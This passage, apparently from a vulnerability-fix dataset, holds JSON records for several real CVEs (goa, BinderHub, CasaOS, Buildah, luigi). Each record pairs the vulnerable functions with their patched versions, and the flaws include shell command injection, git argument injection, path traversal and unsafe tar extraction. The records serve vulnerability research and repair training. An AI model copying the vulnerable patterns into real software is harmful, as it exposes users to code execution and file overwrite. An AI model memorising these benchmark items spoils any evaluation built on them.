{\n\t\t\t\tdefer ff.Close()\n\t\t\t\tdd, err := ff.Stat()\n\t\t\t\tif err == nil {\n\t\t\t\t\tname = index\n\t\t\t\t\td = dd\n\t\t\t\t\tf = ff\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\n\t\t// serveContent will check modification time\n\t\t// Still a directory? (we didn't find an index.html file)\n\t\tif d.IsDir() {\n\t\t\treturn dirList(rw, f)\n\t\t}\n\t\thttp.ServeContent(rw, req, d.Name(), d.ModTime(), f)\n\t\treturn nil\n\t}\n}"}], "fix_func": [{"id": "fix_go_223_1", "commit": "70b5a199d0f813d74423993832c424e1fc73fb39", "file_path": "service.go", "start_line": 366, "end_line": 420, "snippet": "func (ctrl *Controller) FileHandler(path, filename string) Handler {\n\tvar wc string\n\tif idx := strings.LastIndex(path, \"/*\"); idx > -1 && idx < len(path)-1 {\n\t\twc = path[idx+2:]\n\t\tif strings.Contains(wc, \"/\") {\n\t\t\twc = \"\"\n\t\t}\n\t}\n\treturn func(ctx context.Context, rw http.ResponseWriter, req *http.Request) error {\n\t\t// prevent path traversal\n\t\tif attemptsPathTraversal(req.URL.Path, path) {\n\t\t\treturn ErrNotFound(req.URL.Path)\n\t\t}\n\t\tfname := filename\n\t\tif len(wc) > 0 {\n\t\t\tif m, ok := ContextRequest(ctx).Params[wc]; ok {\n\t\t\t\tfname = filepath.Join(filename, m[0])\n\t\t\t}\n\t\t}\n\t\tLogInfo(ctx, \"serve file\", \"name\", fname, \"route\", req.URL.Path)\n\t\tdir, name := filepath.Split(fname)\n\t\tfs := ctrl.FileSystem(dir)\n\t\tf, err := fs.Open(name)\n\t\tif err != nil {\n\t\t\treturn ErrInvalidFile(err)\n\t\t}\n\t\tdefer f.Close()\n\t\td, err := f.Stat()\n\t\tif err != nil {\n\t\t\treturn ErrInvalidFile(err)\n\t\t}\n\t\t// use contents of index.html for directory, if present\n\t\tif d.IsDir() {\n\t\t\tindex := strings.TrimSuffix(name, \"/\") + \"/index.html\"\n\t\t\tff, err := fs.Open(index)\n\t\t\tif err == nil {\n\t\t\t\tdefer ff.Close()\n\t\t\t\tdd, err := ff.Stat()\n\t\t\t\tif err == nil {\n\t\t\t\t\tname = index\n\t\t\t\t\td = dd\n\t\t\t\t\tf = ff\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\n\t\t// serveContent will check modification time\n\t\t// Still a directory? 
(we didn't find an index.html file)\n\t\tif d.IsDir() {\n\t\t\treturn dirList(rw, f)\n\t\t}\n\t\thttp.ServeContent(rw, req, d.Name(), d.ModTime(), f)\n\t\treturn nil\n\t}\n}"}, {"id": "fix_go_223_2", "commit": "70b5a199d0f813d74423993832c424e1fc73fb39", "file_path": "service.go", "start_line": 422, "end_line": 442, "snippet": "func attemptsPathTraversal(req string, path string) bool {\n\tif !strings.Contains(req, \"..\") {\n\t\treturn false\n\t}\n\n\tcurrentPathIdx := 0\n\tif idx := strings.LastIndex(path, \"/*\"); idx > -1 && idx < len(path)-1 {\n\t\treq = req[idx+1:]\n\t}\n\tfor _, runeValue := range strings.FieldsFunc(req, isSlashRune) {\n\t\tif runeValue == \"..\" {\n\t\t\tcurrentPathIdx--\n\t\t\tif currentPathIdx < 0 {\n\t\t\t\treturn true\n\t\t\t}\n\t\t} else {\n\t\t\tcurrentPathIdx++\n\t\t}\n\t}\n\treturn false\n}"}, {"id": "fix_go_223_3", "commit": "70b5a199d0f813d74423993832c424e1fc73fb39", "file_path": "service.go", "start_line": 444, "end_line": 446, "snippet": "func isSlashRune(r rune) bool {\n\treturn os.IsPathSeparator(uint8(r))\n}"}], "vul_patch": "--- a/service.go\n+++ b/service.go\n@@ -7,6 +7,10 @@\n \t\t}\n \t}\n \treturn func(ctx context.Context, rw http.ResponseWriter, req *http.Request) error {\n+\t\t// prevent path traversal\n+\t\tif attemptsPathTraversal(req.URL.Path, path) {\n+\t\t\treturn ErrNotFound(req.URL.Path)\n+\t\t}\n \t\tfname := filename\n \t\tif len(wc) > 0 {\n \t\t\tif m, ok := ContextRequest(ctx).Params[wc]; ok {\n\n--- /dev/null\n+++ b/service.go\n@@ -0,0 +1,21 @@\n+func attemptsPathTraversal(req string, path string) bool {\n+\tif !strings.Contains(req, \"..\") {\n+\t\treturn false\n+\t}\n+\n+\tcurrentPathIdx := 0\n+\tif idx := strings.LastIndex(path, \"/*\"); idx > -1 && idx < len(path)-1 {\n+\t\treq = req[idx+1:]\n+\t}\n+\tfor _, runeValue := range strings.FieldsFunc(req, isSlashRune) {\n+\t\tif runeValue == \"..\" {\n+\t\t\tcurrentPathIdx--\n+\t\t\tif currentPathIdx < 0 {\n+\t\t\t\treturn true\n+\t\t\t}\n+\t\t} else {\n+\t\t\tcurrentPathIdx++\n+\t\t}\n+\t}\n+\treturn false\n+}\n\n--- /dev/null\n+++ b/service.go\n@@ -0,0 +1,3 @@\n+func isSlashRune(r rune) bool {\n+\treturn os.IsPathSeparator(uint8(r))\n+}\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2021-39159", "cve_description": "BinderHub is a kubernetes-based cloud service that allows users to share reproducible interactive computing environments from code repositories. In affected versions a remote code execution vulnerability has been identified in BinderHub, where providing BinderHub with maliciously crafted input could execute code in the BinderHub context, with the potential to egress credentials of the BinderHub deployment, including JupyterHub API tokens, kubernetes service accounts, and docker registry credentials. This may provide the ability to manipulate images and other user created pods in the deployment, with the potential to escalate to the host depending on the underlying kubernetes configuration. Users are advised to update to version 0.2.0-n653. 
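The BinderHub advisory just introduced is a git argument-injection bug, and its one-line patch (shown in the record's fix_func below) inserts the "--" end-of-options marker into the git ls-remote invocation. A hedged, self-contained Python sketch of the same defence:

```python
# Sketch of the argument-injection issue behind the BinderHub advisory: a
# repo or ref beginning with "-" is parsed by git as an option unless "--"
# separates options from positional arguments. The record's actual patch
# makes exactly this change; this wrapper is only an illustration.
import subprocess

def ls_remote(repo: str, ref: str) -> str:
    # "--" ensures repo/ref can never be interpreted as git options
    result = subprocess.run(
        ["git", "ls-remote", "--", repo, ref],
        capture_output=True, text=True, check=True,
    )
    return result.stdout.split(None, 1)[0] if result.stdout else ""

# Without "--", a ref like "--upload-pack=touch /tmp/pwned" would be consumed
# by git as an option, executing an attacker-chosen command.
```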
If users are unable to update they may disable the git repo provider by specifying the `BinderHub.repo_providers` as a workaround.", "cwe_info": {"CWE-94": {"name": "Improper Control of Generation of Code ('Code Injection')", "description": "The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment."}, "CWE-77": {"name": "Improper Neutralization of Special Elements used in a Command ('Command Injection')", "description": "The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component."}, "CWE-78": {"name": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')", "description": "The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component."}}, "repo": "https://github.com/jupyterhub/binderhub", "patch_url": ["https://github.com/jupyterhub/binderhub/commit/195caac172690456dcdc8cc7a6ca50e05abf8182", "https://github.com/jupyterhub/binderhub/commit/195caac172690456dcdc8cc7a6ca50e05abf8182.patch"], "programing_language": "Python", "vul_func": [{"id": "vul_py_193_1", "commit": "034430a", "file_path": "binderhub/repoproviders.py", "start_line": 478, "end_line": 500, "snippet": " async def get_resolved_ref(self):\n if hasattr(self, 'resolved_ref'):\n return self.resolved_ref\n\n try:\n # Check if the reference is a valid SHA hash\n self.sha1_validate(self.unresolved_ref)\n except ValueError:\n # The ref is a head/tag and we resolve it using `git ls-remote`\n command = [\"git\", \"ls-remote\", self.repo, self.unresolved_ref]\n result = subprocess.run(command, universal_newlines=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n if result.returncode:\n raise RuntimeError(\"Unable to run git ls-remote to get the `resolved_ref`: {}\".format(result.stderr))\n if not result.stdout:\n return None\n resolved_ref = result.stdout.split(None, 1)[0]\n self.sha1_validate(resolved_ref)\n self.resolved_ref = resolved_ref\n else:\n # The ref already was a valid SHA hash\n self.resolved_ref = self.unresolved_ref\n\n return self.resolved_ref"}], "fix_func": [{"id": "fix_py_193_1", "commit": "195caac", "file_path": "binderhub/repoproviders.py", "start_line": 478, "end_line": 500, "snippet": " async def get_resolved_ref(self):\n if hasattr(self, 'resolved_ref'):\n return self.resolved_ref\n\n try:\n # Check if the reference is a valid SHA hash\n self.sha1_validate(self.unresolved_ref)\n except ValueError:\n # The ref is a head/tag and we resolve it using `git ls-remote`\n command = [\"git\", \"ls-remote\", \"--\", self.repo, self.unresolved_ref]\n result = subprocess.run(command, universal_newlines=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n if result.returncode:\n raise RuntimeError(\"Unable to run git ls-remote to get the `resolved_ref`: {}\".format(result.stderr))\n if not result.stdout:\n return None\n resolved_ref = result.stdout.split(None, 1)[0]\n self.sha1_validate(resolved_ref)\n self.resolved_ref = resolved_ref\n else:\n # The ref already was a valid SHA hash\n 
self.resolved_ref = self.unresolved_ref\n\n return self.resolved_ref"}], "vul_patch": "--- a/binderhub/repoproviders.py\n+++ b/binderhub/repoproviders.py\n@@ -7,7 +7,7 @@\n self.sha1_validate(self.unresolved_ref)\n except ValueError:\n # The ref is a head/tag and we resolve it using `git ls-remote`\n- command = [\"git\", \"ls-remote\", self.repo, self.unresolved_ref]\n+ command = [\"git\", \"ls-remote\", \"--\", self.repo, self.unresolved_ref]\n result = subprocess.run(command, universal_newlines=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n if result.returncode:\n raise RuntimeError(\"Unable to run git ls-remote to get the `resolved_ref`: {}\".format(result.stderr))\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2023-37469", "cve_description": "CasaOS is an open-source personal cloud system. Prior to version 0.4.4, if an authenticated user using CasaOS is able to successfully connect to a controlled SMB server, they are able to execute arbitrary commands. Version 0.4.4 contains a patch for the issue.", "cwe_info": {"CWE-94": {"name": "Improper Control of Generation of Code ('Code Injection')", "description": "The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment."}, "CWE-77": {"name": "Improper Neutralization of Special Elements used in a Command ('Command Injection')", "description": "The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component."}, "CWE-78": {"name": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')", "description": "The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component."}}, "repo": "https://github.com/IceWhaleTech/CasaOS", "patch_url": ["https://github.com/IceWhaleTech/CasaOS/commit/af440eac5563644854ff33f72041e52d3fd1f47c"], "programing_language": "Go", "vul_func": [{"id": "vul_go_117_1", "commit": "34b4e15", "file_path": "route/v1/samba.go", "start_line": 131, "end_line": 157, "snippet": "func PostSambaConnectionsCreate(c *gin.Context) {\n\tconnection := model.Connections{}\n\tc.ShouldBindJSON(&connection)\n\tif connection.Port == \"\" {\n\t\tconnection.Port = \"445\"\n\t}\n\tif connection.Username == \"\" || connection.Host == \"\" {\n\t\tc.JSON(common_err.CLIENT_ERROR, model.Result{Success: common_err.CHARACTER_LIMIT, Message: common_err.GetMsg(common_err.CHARACTER_LIMIT)})\n\t\treturn\n\t}\n\n\tif ok, _ := regexp.MatchString(`^[\\w@#*.]{4,30}$`, connection.Password); !ok {\n\t\tc.JSON(common_err.CLIENT_ERROR, model.Result{Success: common_err.CHARACTER_LIMIT, Message: common_err.GetMsg(common_err.CHARACTER_LIMIT)})\n\t\treturn\n\t}\n\tif ok, _ := regexp.MatchString(`^[\\w@#*.]{4,30}$`, connection.Username); !ok {\n\t\tc.JSON(common_err.CLIENT_ERROR, model.Result{Success: common_err.INVALID_PARAMS, Message: common_err.GetMsg(common_err.INVALID_PARAMS)})\n\t\treturn\n\t}\n\tif !ip_helper.IsIPv4(connection.Host) && !ip_helper.IsIPv6(connection.Host) {\n\t\tc.JSON(common_err.CLIENT_ERROR, 
model.Result{Success: common_err.INVALID_PARAMS, Message: common_err.GetMsg(common_err.INVALID_PARAMS)})\n\t\treturn\n\t}\n\tif ok, _ := regexp.MatchString(\"^[0-9]{1,6}$\", connection.Port); !ok {\n\t\tc.JSON(common_err.CLIENT_ERROR, model.Result{Success: common_err.INVALID_PARAMS, Message: common_err.GetMsg(common_err.INVALID_PARAMS)})\n\t\treturn\n\t}"}, {"id": "vul_go_117_2", "commit": "34b4e15", "file_path": "service/connections.go", "start_line": 59, "end_line": 62, "snippet": "func (s *connectionsStruct) MountSmaba(username, host, directory, port, mountPoint, password string) string {\n\tstr := command2.ExecResultStr(\"source \" + config.AppInfo.ShellPath + \"/helper.sh ;MountCIFS \" + username + \" \" + host + \" \" + directory + \" \" + port + \" \" + mountPoint + \" \" + password)\n\treturn str\n}"}], "fix_func": [{"id": "fix_go_117_1", "commit": "af440ea", "file_path": "route/v1/samba.go", "start_line": 129, "end_line": 139, "snippet": "func PostSambaConnectionsCreate(c *gin.Context) {\n\tconnection := model.Connections{}\n\tc.ShouldBindJSON(&connection)\n\tif connection.Port == \"\" {\n\t\tconnection.Port = \"445\"\n\t}\n\tif connection.Username == \"\" || connection.Host == \"\" {\n\t\tc.JSON(common_err.CLIENT_ERROR, model.Result{Success: common_err.CHARACTER_LIMIT, Message: common_err.GetMsg(common_err.CHARACTER_LIMIT)})\n\t\treturn\n\t}\n"}, {"id": "fix_go_117_2", "commit": "af440ea", "file_path": "service/connections.go", "start_line": 60, "end_line": 71, "snippet": "func (s *connectionsStruct) MountSmaba(username, host, directory, port, mountPoint, password string) error {\n\terr := unix.Mount(\n\t\tfmt.Sprintf(\"//%s/%s\", host, directory),\n\t\tmountPoint,\n\t\t\"cifs\",\n\t\tunix.MS_NOATIME|unix.MS_NODEV|unix.MS_NOSUID,\n\t\tfmt.Sprintf(\"username=%s,password=%s\", username, password),\n\t)\n\treturn err\n\t//str := command2.ExecResultStr(\"source \" + config.AppInfo.ShellPath + \"/helper.sh ;MountCIFS \" + username + \" \" + host + \" \" + directory + \" \" + port + \" \" + mountPoint + \" \" + password)\n\t//return str\n}"}], "vul_patch": "--- a/route/v1/samba.go\n+++ b/route/v1/samba.go\n@@ -8,20 +8,3 @@\n \t\tc.JSON(common_err.CLIENT_ERROR, model.Result{Success: common_err.CHARACTER_LIMIT, Message: common_err.GetMsg(common_err.CHARACTER_LIMIT)})\n \t\treturn\n \t}\n-\n-\tif ok, _ := regexp.MatchString(`^[\\w@#*.]{4,30}$`, connection.Password); !ok {\n-\t\tc.JSON(common_err.CLIENT_ERROR, model.Result{Success: common_err.CHARACTER_LIMIT, Message: common_err.GetMsg(common_err.CHARACTER_LIMIT)})\n-\t\treturn\n-\t}\n-\tif ok, _ := regexp.MatchString(`^[\\w@#*.]{4,30}$`, connection.Username); !ok {\n-\t\tc.JSON(common_err.CLIENT_ERROR, model.Result{Success: common_err.INVALID_PARAMS, Message: common_err.GetMsg(common_err.INVALID_PARAMS)})\n-\t\treturn\n-\t}\n-\tif !ip_helper.IsIPv4(connection.Host) && !ip_helper.IsIPv6(connection.Host) {\n-\t\tc.JSON(common_err.CLIENT_ERROR, model.Result{Success: common_err.INVALID_PARAMS, Message: common_err.GetMsg(common_err.INVALID_PARAMS)})\n-\t\treturn\n-\t}\n-\tif ok, _ := regexp.MatchString(\"^[0-9]{1,6}$\", connection.Port); !ok {\n-\t\tc.JSON(common_err.CLIENT_ERROR, model.Result{Success: common_err.INVALID_PARAMS, Message: common_err.GetMsg(common_err.INVALID_PARAMS)})\n-\t\treturn\n-\t}\n\n--- a/service/connections.go\n+++ b/service/connections.go\n@@ -1,4 +1,12 @@\n-func (s *connectionsStruct) MountSmaba(username, host, directory, port, mountPoint, password string) string {\n-\tstr := command2.ExecResultStr(\"source \" + 
config.AppInfo.ShellPath + \"/helper.sh ;MountCIFS \" + username + \" \" + host + \" \" + directory + \" \" + port + \" \" + mountPoint + \" \" + password)\n-\treturn str\n+func (s *connectionsStruct) MountSmaba(username, host, directory, port, mountPoint, password string) error {\n+\terr := unix.Mount(\n+\t\tfmt.Sprintf(\"//%s/%s\", host, directory),\n+\t\tmountPoint,\n+\t\t\"cifs\",\n+\t\tunix.MS_NOATIME|unix.MS_NODEV|unix.MS_NOSUID,\n+\t\tfmt.Sprintf(\"username=%s,password=%s\", username, password),\n+\t)\n+\treturn err\n+\t//str := command2.ExecResultStr(\"source \" + config.AppInfo.ShellPath + \"/helper.sh ;MountCIFS \" + username + \" \" + host + \" \" + directory + \" \" + port + \" \" + mountPoint + \" \" + password)\n+\t//return str\n }\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2020-10696", "cve_description": "A path traversal flaw was found in Buildah in versions before 1.14.5. This flaw allows an attacker to trick a user into building a malicious container image hosted on an HTTP(s) server and then write files to the user's system anywhere that the user has permissions.", "cwe_info": {"CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/containers/buildah", "patch_url": ["https://github.com/containers/buildah/commit/c61925b8936e93a5e900f91b653a846f7ea3a9ed"], "programing_language": "Go", "vul_func": [{"id": "vul_go_122_1", "commit": "aba0d4d", "file_path": "imagebuildah/util.go", "start_line": 38, "end_line": 65, "snippet": "func downloadToDirectory(url, dir string) error {\n\tlogrus.Debugf(\"extracting %q to %q\", url, dir)\n\tresp, err := http.Get(url)\n\tif err != nil {\n\t\treturn errors.Wrapf(err, \"error getting %q\", url)\n\t}\n\tdefer resp.Body.Close()\n\tif resp.ContentLength == 0 {\n\t\treturn errors.Errorf(\"no contents in %q\", url)\n\t}\n\tif err := chrootarchive.Untar(resp.Body, dir, nil); err != nil {\n\t\tresp1, err := http.Get(url)\n\t\tif err != nil {\n\t\t\treturn errors.Wrapf(err, \"error getting %q\", url)\n\t\t}\n\t\tdefer resp1.Body.Close()\n\t\tbody, err := ioutil.ReadAll(resp1.Body)\n\t\tif err != nil {\n\t\t\treturn errors.Wrapf(err, \"Failed to read %q\", url)\n\t\t}\n\t\tdockerfile := filepath.Join(dir, \"Dockerfile\")\n\t\t// Assume this is a Dockerfile\n\t\tif err := ioutil.WriteFile(dockerfile, body, 0600); err != nil {\n\t\t\treturn errors.Wrapf(err, \"Failed to write %q to %q\", url, dockerfile)\n\t\t}\n\t}\n\treturn nil\n}"}, {"id": "vul_go_122_2", "commit": "aba0d4d", "file_path": "imagebuildah/util.go", "start_line": 67, "end_line": 83, "snippet": "func stdinToDirectory(dir string) error {\n\tlogrus.Debugf(\"extracting stdin to %q\", dir)\n\tr := bufio.NewReader(os.Stdin)\n\tb, err := ioutil.ReadAll(r)\n\tif err != nil {\n\t\treturn errors.Wrapf(err, \"Failed to read from stdin\")\n\t}\n\treader := bytes.NewReader(b)\n\tif err := chrootarchive.Untar(reader, dir, nil); err != nil {\n\t\tdockerfile := filepath.Join(dir, \"Dockerfile\")\n\t\t// Assume this is a Dockerfile\n\t\tif err := ioutil.WriteFile(dockerfile, b, 0600); err != nil {\n\t\t\treturn errors.Wrapf(err, \"Failed to write bytes 
to %q\", dockerfile)\n\t\t}\n\t}\n\treturn nil\n}"}], "fix_func": [{"id": "fix_go_122_1", "commit": "c61925b", "file_path": "imagebuildah/util.go", "start_line": 39, "end_line": 66, "snippet": "func downloadToDirectory(url, dir string) error {\n\tlogrus.Debugf(\"extracting %q to %q\", url, dir)\n\tresp, err := http.Get(url)\n\tif err != nil {\n\t\treturn errors.Wrapf(err, \"error getting %q\", url)\n\t}\n\tdefer resp.Body.Close()\n\tif resp.ContentLength == 0 {\n\t\treturn errors.Errorf(\"no contents in %q\", url)\n\t}\n\tif err := chrootarchive.Untar(resp.Body, dir, nil); err != nil {\n\t\tresp1, err := http.Get(url)\n\t\tif err != nil {\n\t\t\treturn errors.Wrapf(err, \"error getting %q\", url)\n\t\t}\n\t\tdefer resp1.Body.Close()\n\t\tbody, err := ioutil.ReadAll(resp1.Body)\n\t\tif err != nil {\n\t\t\treturn errors.Wrapf(err, \"Failed to read %q\", url)\n\t\t}\n\t\tdockerfile := filepath.Join(dir, \"Dockerfile\")\n\t\t// Assume this is a Dockerfile\n\t\tif err := ioutils.AtomicWriteFile(dockerfile, body, 0600); err != nil {\n\t\t\treturn errors.Wrapf(err, \"Failed to write %q to %q\", url, dockerfile)\n\t\t}\n\t}\n\treturn nil\n}"}, {"id": "fix_go_122_2", "commit": "c61925b", "file_path": "imagebuildah/util.go", "start_line": 68, "end_line": 84, "snippet": "func stdinToDirectory(dir string) error {\n\tlogrus.Debugf(\"extracting stdin to %q\", dir)\n\tr := bufio.NewReader(os.Stdin)\n\tb, err := ioutil.ReadAll(r)\n\tif err != nil {\n\t\treturn errors.Wrapf(err, \"Failed to read from stdin\")\n\t}\n\treader := bytes.NewReader(b)\n\tif err := chrootarchive.Untar(reader, dir, nil); err != nil {\n\t\tdockerfile := filepath.Join(dir, \"Dockerfile\")\n\t\t// Assume this is a Dockerfile\n\t\tif err := ioutils.AtomicWriteFile(dockerfile, b, 0600); err != nil {\n\t\t\treturn errors.Wrapf(err, \"Failed to write bytes to %q\", dockerfile)\n\t\t}\n\t}\n\treturn nil\n}"}], "vul_patch": "--- a/imagebuildah/util.go\n+++ b/imagebuildah/util.go\n@@ -20,7 +20,7 @@\n \t\t}\n \t\tdockerfile := filepath.Join(dir, \"Dockerfile\")\n \t\t// Assume this is a Dockerfile\n-\t\tif err := ioutil.WriteFile(dockerfile, body, 0600); err != nil {\n+\t\tif err := ioutils.AtomicWriteFile(dockerfile, body, 0600); err != nil {\n \t\t\treturn errors.Wrapf(err, \"Failed to write %q to %q\", url, dockerfile)\n \t\t}\n \t}\n\n--- a/imagebuildah/util.go\n+++ b/imagebuildah/util.go\n@@ -9,7 +9,7 @@\n \tif err := chrootarchive.Untar(reader, dir, nil); err != nil {\n \t\tdockerfile := filepath.Join(dir, \"Dockerfile\")\n \t\t// Assume this is a Dockerfile\n-\t\tif err := ioutil.WriteFile(dockerfile, b, 0600); err != nil {\n+\t\tif err := ioutils.AtomicWriteFile(dockerfile, b, 0600); err != nil {\n \t\t\treturn errors.Wrapf(err, \"Failed to write bytes to %q\", dockerfile)\n \t\t}\n \t}\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2024-21542", "cve_description": "Versions of the package luigi before 3.6.0 are vulnerable to Arbitrary File Write via Archive Extraction (Zip Slip) due to improper destination file path validation in the _extract_packages_archive function.", "cwe_info": {"CWE-73": {"name": "External Control of File Name or Path", "description": "The product allows user input to control or influence paths or file names that are used in filesystem operations."}, "CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath 
a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/spotify/luigi", "patch_url": ["https://github.com/spotify/luigi/commit/b5d1b965ead7d9f777a3216369b5baf23ec08999"], "programing_language": "Python", "vul_func": [{"id": "vul_py_36_1", "commit": "c9a0d20", "file_path": "luigi/contrib/lsf_runner.py", "start_line": 47, "end_line": 62, "snippet": "def extract_packages_archive(work_dir):\n package_file = os.path.join(work_dir, \"packages.tar\")\n if not os.path.exists(package_file):\n return\n\n curdir = os.path.abspath(os.curdir)\n\n os.chdir(work_dir)\n tar = tarfile.open(package_file)\n for tarinfo in tar:\n tar.extract(tarinfo)\n tar.close()\n if '' not in sys.path:\n sys.path.insert(0, '')\n\n os.chdir(curdir)"}, {"id": "vul_py_36_2", "commit": "c9a0d20", "file_path": "luigi/contrib/sge_runner.py", "start_line": 59, "end_line": 74, "snippet": "def _extract_packages_archive(work_dir):\n package_file = os.path.join(work_dir, \"packages.tar\")\n if not os.path.exists(package_file):\n return\n\n curdir = os.path.abspath(os.curdir)\n\n os.chdir(work_dir)\n tar = tarfile.open(package_file)\n for tarinfo in tar:\n tar.extract(tarinfo)\n tar.close()\n if '' not in sys.path:\n sys.path.insert(0, '')\n\n os.chdir(curdir)"}], "fix_func": [{"id": "fix_py_36_1", "commit": "b5d1b96", "file_path": "luigi/contrib/lsf_runner.py", "start_line": 31, "end_line": 31, "snippet": "from luigi.safe_extractor import SafeExtractor"}, {"id": "fix_py_36_2", "commit": "b5d1b96", "file_path": "luigi/contrib/lsf_runner.py", "start_line": 47, "end_line": 60, "snippet": "def extract_packages_archive(work_dir):\n package_file = os.path.join(work_dir, \"packages.tar\")\n if not os.path.exists(package_file):\n return\n\n curdir = os.path.abspath(os.curdir)\n\n os.chdir(work_dir)\n extractor = SafeExtractor(work_dir)\n extractor.safe_extract(package_file)\n if '' not in sys.path:\n sys.path.insert(0, '')\n\n os.chdir(curdir)"}, {"id": "fix_py_36_3", "commit": "b5d1b96", "file_path": "luigi/contrib/sge_runner.py", "start_line": 39, "end_line": 39, "snippet": "from luigi.safe_extractor import SafeExtractor"}, {"id": "fix_py_36_4", "commit": "b5d1b96", "file_path": "luigi/contrib/sge_runner.py", "start_line": 59, "end_line": 72, "snippet": "def _extract_packages_archive(work_dir):\n package_file = os.path.join(work_dir, \"packages.tar\")\n if not os.path.exists(package_file):\n return\n\n curdir = os.path.abspath(os.curdir)\n\n os.chdir(work_dir)\n extractor = SafeExtractor(work_dir)\n extractor.safe_extract(package_file)\n if '' not in sys.path:\n sys.path.insert(0, '')\n\n os.chdir(curdir)"}, {"id": "fix_py_36_5", "commit": "b5d1b96", "file_path": "luigi/safe_extractor.py", "start_line": 1, "end_line": 97, "snippet": "# -*- coding: utf-8 -*-\n#\n# Copyright 2012-2015 Spotify AB\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the 
License.\n#\n\n\"\"\"\nThis module provides a class `SafeExtractor` that offers a secure way to extract tar files while\nmitigating path traversal vulnerabilities, which can occur when files inside the archive are\ncrafted to escape the intended extraction directory.\n\nThe `SafeExtractor` ensures that the extracted file paths are validated before extraction to\nprevent malicious archives from extracting files outside the intended directory.\n\nClasses:\n SafeExtractor: A class to securely extract tar files with protection against path traversal attacks.\n\nUsage Example:\n extractor = SafeExtractor(\"/desired/directory\")\n extractor.safe_extract(\"archive.tar\")\n\"\"\"\n\nimport os\nimport tarfile\n\n\nclass SafeExtractor:\n \"\"\"\n A class to safely extract tar files, ensuring that no path traversal\n vulnerabilities are exploited.\n\n Attributes:\n path (str): The directory to extract files into.\n\n Methods:\n _is_within_directory(directory, target):\n Checks if a target path is within a given directory.\n\n safe_extract(tar_path, members=None, \\\\*, numeric_owner=False):\n Safely extracts the contents of a tar file to the specified directory.\n \"\"\"\n\n def __init__(self, path=\".\"):\n \"\"\"\n Initializes the SafeExtractor with the specified directory path.\n\n Args:\n path (str): The directory to extract files into. Defaults to the current directory.\n \"\"\"\n self.path = path\n\n @staticmethod\n def _is_within_directory(directory, target):\n \"\"\"\n Checks if a target path is within a given directory.\n\n Args:\n directory (str): The directory to check against.\n target (str): The target path to check.\n\n Returns:\n bool: True if the target path is within the directory, False otherwise.\n \"\"\"\n abs_directory = os.path.abspath(directory)\n abs_target = os.path.abspath(target)\n prefix = os.path.commonprefix([abs_directory, abs_target])\n return prefix == abs_directory\n\n def safe_extract(self, tar_path, members=None, *, numeric_owner=False):\n \"\"\"\n Safely extracts the contents of a tar file to the specified directory.\n\n Args:\n tar_path (str): The path to the tar file to extract.\n members (list, optional): A list of members to extract. Defaults to None.\n numeric_owner (bool, optional): If True, only the numeric owner will be used. 
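Since the luigi record's SafeExtractor rests on the prefix test in _is_within_directory, a short runnable demonstration may help. Paths are illustrative, and the sibling-prefix caveat flagged on the last line is a general property of os.path.commonprefix rather than a claim about luigi's behaviour in practice.

```python
# Demonstration of the containment check used by SafeExtractor above.
import os

def is_within_directory(directory: str, target: str) -> bool:
    abs_directory = os.path.abspath(directory)
    abs_target = os.path.abspath(target)
    return os.path.commonprefix([abs_directory, abs_target]) == abs_directory

print(is_within_directory("/data/x", "/data/x/pkg/mod.py"))    # True
print(is_within_directory("/data/x", "/data/x/../../etc/sh"))  # False
print(is_within_directory("/data/x", "/data/x_evil/mod.py"))   # True (!)
# The last case is the sibling-prefix caveat of string-based commonprefix;
# comparing against directory + os.sep, or using os.path.commonpath, is the
# usual way to tighten this kind of check.
```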
